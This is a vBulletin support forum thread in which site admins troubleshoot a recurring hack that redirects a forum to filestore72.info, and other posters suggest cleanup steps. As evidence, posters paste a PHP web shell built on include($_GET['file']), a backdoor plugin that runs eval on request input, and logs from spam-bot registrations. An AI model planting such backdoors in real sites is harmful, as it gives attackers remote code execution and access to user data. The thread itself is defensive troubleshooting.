Yes, I would uninstall VBSEO
VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/
Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info
Collapse
X
-
I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.
ThanksLeave a comment:
-
Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?
ThanksLeave a comment:
-
Ok I'm digging deeper.
I just found a file called my.log in the root of the forum. It contains 2 users info ... like this:
Code:Array ( [userid] => 11582 [usergroupid] => 25 [membergroupids] => [infractiongroupids] => [username] => username here [password] => password here [salt] => salt code here [email] => email.address.here )
Code:[Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF; [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
Code:<? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>
Leave a comment:
-
1. They are ok. No one who should not have access, is getting access.
2. We had one 3 months ago that we deleted, that one probably gained access trough some PHP Root files I found and deleted.
4. I went to each of them disable them one by one.
Filestore still comes back after 1-2 days. Really no idea what to do.
vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
All old vB files got deleted. All extra PHP files got deleted.
Fond some PHP Root files in Attachment folders all got deleted.
I protected the 777 folders.
Checked the template
So no rogue admins, no root php files.
Filestore still comes back.
ThanksLeave a comment:
-
Change your admin passwords.
Check for any admins you don't recognise.
Password protect your admincp folder using .htaccess
Go through each plug in and delete any that you don't recognise.
If you're still having problems after that, please start your own topic with full details of the problem.Leave a comment:
-
Ok my problem persists. Any ideas?
I don't use vBSEO. I have disabled plugins one by one. The filestore hack always come back after 1-2 days.Leave a comment:
-
Ok. I'm also posting here. Same problem. Not vbSEO installed. Did everything from what's been suggested. The filestore problem still persists even after the upgrade.
I'm looking into plugins and I see this:
A Plugin Named: 123
Product: vBulletin
Hook Location: faq_complete
This is the code:
Code:eval(stripslashes($_REQUEST[ass]));
Do you have any ideas on how to fix this? It keeps coming back.Leave a comment:
-
Look at the links in Post # 3, and update VBSEO.
To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.Leave a comment:
-
But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the pluginLeave a comment:
-
Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.Leave a comment:
Related Topics
Collapse
-
by DanloonaHi again.
I got issue with redirection.
How I can redirect https://www.domain.co.uk to https://domain.co.uk ?
I've added redirection on hosting panel but looks like...-
Channel: Support Issues & Questions
Mon 8 Oct '18, 4:32am -
Leave a comment: